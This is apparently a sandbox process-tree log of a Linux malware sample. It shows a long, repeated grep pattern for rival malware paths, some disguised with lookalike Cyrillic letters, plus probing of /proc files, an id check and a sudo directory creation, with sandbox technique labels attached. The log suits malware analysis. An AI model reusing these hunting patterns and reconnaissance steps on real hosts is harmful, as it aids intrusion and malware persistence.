/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1233
-
-
/bin/grepgrep exe2⤵PID:1236
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1235
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1238
-
-
/bin/grepgrep exe2⤵PID:1241
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1240
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1243
-
-
/bin/grepgrep exe2⤵PID:1246
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1245
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1248
-
-
/bin/grepgrep exe2⤵PID:1251
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1253
-
-
/bin/grepgrep exe2⤵PID:1256
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1255
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1258
-
-
/bin/grepgrep exe2⤵PID:1261
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1260
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1263
-
-
/bin/grepgrep exe2⤵PID:1266
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1265
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1268
-
-
/bin/grepgrep exe2⤵PID:1271
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1270
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1273
-
-
/bin/grepgrep exe2⤵PID:1276
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1278
-
-
/bin/grepgrep exe2⤵PID:1281
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1280
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1283
-
-
/bin/grepgrep exe2⤵PID:1286
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1285
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1288
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1290
-
-
/bin/grepgrep exe2⤵PID:1291
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1294
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1297
-
-
/bin/grepgrep exe2⤵PID:1298
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1300
-
-
/bin/grepgrep exe2⤵PID:1304
-
-
/bin/lsls -latrh /proc/net2⤵PID:1303
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1307
-
-
/bin/grepgrep exe2⤵PID:1310
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1309
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1314
-
-
/bin/grepgrep exe2⤵PID:1317
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1319
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1322
-
-
/bin/grepgrep exe2⤵PID:1323
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1326
-
-
/bin/grepgrep exe2⤵PID:1330
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1329
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1333
-
-
/bin/grepgrep exe2⤵PID:1336
-
-
/bin/lsls -latrh /proc/self2⤵PID:1335
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1339
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/grepgrep exe2⤵PID:1349
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1348
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1352
-
-
/bin/grepgrep exe2⤵PID:1355
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1354
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1359
-
-
/bin/grepgrep exe2⤵PID:1362
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1361
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1369
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1368
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1371
-
-
/bin/grepgrep exe2⤵PID:1375
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1374
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep exe2⤵PID:1381
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1384
-
-
/bin/grepgrep exe2⤵PID:1388
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1394
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1393
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1397
-
-
/bin/grepgrep exe2⤵PID:1401
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1400
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1404
-
-
/bin/grepgrep exe2⤵PID:1407
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1406
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/grepgrep exe2⤵PID:1414
-
-
/bin/lsls -latrh /proc/version2⤵PID:1413
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1416
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1419
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1423
-
-
/bin/grepgrep exe2⤵PID:1426
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1425
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1428
-
-
/bin/grepgrep exe2⤵PID:1431
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1433
-
-
/usr/bin/idid -u2⤵PID:1434
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1435 -
